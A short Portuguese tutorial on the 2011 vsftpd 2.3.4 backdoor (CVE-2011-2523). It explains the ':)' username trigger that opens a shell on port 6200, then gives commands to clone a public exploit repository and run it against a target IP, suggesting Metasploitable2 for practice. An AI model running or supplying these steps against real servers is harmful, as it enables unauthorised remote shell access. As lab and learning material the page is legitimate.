
Exploit em Python para vsftpd 2.3.4 - Execução de Comandos via Backdoor
O Very Secure FTP Daemon (vsftpd) é um servidor FTP para plataformas tipo Unix, incluindo Linux. É distribuído sob os termos da GNU General Public Licence. Suporta IPv6 e SSL.
Foi revelado em julho de 2011 que a versão 2.3.4 do vsftpd, que podia ser baixada do site principal, havia sido comprometida. Utilizadores que iniciem sessão num servidor vsftpd-2.3.4 comprometido podem obter uma shell de comandos na porta 6200 ao introduzir um smiley :) como nome de utilizador. Isto não era uma falha de segurança no vsftpd; em vez disso, alguém tinha carregado uma versão separada do vsftpd que continha uma backdoor. O site foi desde então migrado para o Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP

Pode testar o exploit no Metasploitable2